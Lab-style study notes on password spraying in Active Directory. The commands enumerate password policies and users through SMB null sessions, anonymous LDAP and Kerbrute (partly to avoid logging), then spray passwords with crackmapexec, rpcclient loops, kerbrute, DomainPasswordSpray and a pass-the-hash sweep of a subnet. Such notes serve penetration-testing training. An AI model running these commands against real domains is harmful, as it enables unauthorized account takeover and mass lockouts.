Attempting to log into an exposed service using one common password and longer list of usernames or email addreses.
The main concern is locking out hundreds of production accounts. It is also essential to introduce a delay between login attempts. If we do not know the password policy, we should wait a few hours between attempts.
Retrieving Password Policies
SMB Null Sessions
With valid domain credentials we can obtain it remotely
crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --pass-polWithout credentials we obtainit via an SMB NULL session.
- SMB NULL sessions allow an unauthenticated attacker to retrieve information from the domain
- misconfiguration resulting from legacy DCs being upgrade in place.
# check a DC for SMB NULL
rpcclient -U "" -N 172.16.5.5
# obtain password policy
rpcclient $> querydominfo
# we can also use enum4linux built around Samba suite tools
enum4linux-ng -P 172.16.5.5We can also enumerate a null session from Windows
net use \\DC01\ipc$ "" /u:""LDAP Anonymous Bind
Allows an unauthenticated attacker to retrieve information from the domain such as complete listing of users, groups, computers, user account attributes, and the domain password policy.
ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLengthIf we are authenticated to the domain from a Windows host, we can retrieve the password policy using built-in tools.
net accounts
# using PowerView
Import-Module .\PowerView.ps1
Get-DomainPolicyUser Enumeration
To successfully mount a password spraying attack, we first need a list of valid domain users to attempt to authenticate with.
SMB NULL Session User List
enum4linux -U 172.16.5.5 | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"
# type enumdomusers after connecting
rpcclient -U "" -N 172.16.5.5
# shows the badpwdcount so we can remove account from our list that are close the lockout threshold
crackmapexec smb 172.16.5.5 --usersLDAP Anonymous
ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "
./windapsearch.py --dc-ip 172.16.5.5 -u "" -UKerberos Pre-Authentication
If we have no access at all from our position in the internal network we can enumerated using Kerbrute. This tool uses Kerberos Pre-Authentication which doesn’t generate windows logs. Sends TGT requests to the domain controller without Kerberos Pre-Authentication to perform username enumeration. If the KDC responds with PRINCIPAL UNKNOWN, the username is invalid. `
kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt This technique will however generate event ID 4768: A Kerberos authentication ticket (TGT) was requested if the Kerberos event logging is enabled in group policy.
Validate Credentials
Linux
Once we have our username list we can finally validate which passwords works.
sudo crackmapexec smb 172.16.5.5 -u htb-student -p Academy_student_AD! --users
# bash one-liner
for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1Internal password spraying can also be attempted across multiple hosts in the network if we have the local administrator account access. Oftentimes local administrator passwords will be reused or formatted similarly.
# local admin sprayinh
sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +Windows
If we have foothold on a domain-joined Windows host, the DomainPasswordSpray tool can be used. It will automatically generated a user list from the AD, query the password policy, and exclude user accounts with one attempt from lockout.
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue